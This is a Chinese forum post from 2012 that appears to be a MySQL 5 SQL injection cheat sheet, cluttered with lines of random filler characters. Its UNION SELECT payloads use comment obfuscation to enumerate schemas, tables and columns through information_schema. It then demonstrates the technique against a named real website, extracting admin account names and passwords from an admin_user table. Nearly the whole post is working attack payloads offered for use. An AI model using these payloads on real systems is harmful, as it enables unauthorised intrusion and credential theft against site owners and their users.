查库( J4 x# a- n% k& y
7 D& Q: ~( u5 V4 W- [' g
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
# X- U) Z1 J- O. J
4 F$ S e$ x# y& s0 ^% ?6 J查表
+ u, Y) n' d) x" f( _6 {/ n
/ N; r: g+ m0 i# c" A& Y) Xid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
M- j% T$ L: G: J( o O. N
: Z9 n. }8 d/ X+ A1 n, O查段
6 z" J( @# d7 c
, w' G# Q" V4 G5 r: w+ Q hid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1# _5 E1 R( ]( H1 V4 u1 h
0 @: n! ~3 p% ~% W( n6 I
, o4 l, e, ^) Y# Xmysql5高级注入方法暴表8 {" G7 s& n" R1 H( k. v {
- S" D! Z: _6 Q5 e5 {6 R5 d" V
例子如下:
+ s0 X- W' c/ s: I6 J
5 Q; h4 b$ o [4 _1.爆表& u! d# x0 E+ m5 q5 Y$ V
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
! S: t/ B" r! m这样爆到第4个时出现了admin_user表。
+ C3 F3 M9 q6 o2 A: T1 w
: W# C# `: g2 k- T# d2.暴字段: R) {7 @1 r/ ~ Z
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
# G c# a1 B. q& z0 K: P- @- p& t7 c% P
, k% W% K4 s3 X, [
3.爆密码
. f5 h7 b, K/ g8 S3 h7 n1 uhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
# i. \- p4 H; {; q: d3 g# d0 A
/ W1 I( I6 j# R9 }8 x, F9 Z2 C+ H+ O
( Z) J# T! t' ~( q! P |
发表于 2012-9-13 16:29:37
收藏
支持
反对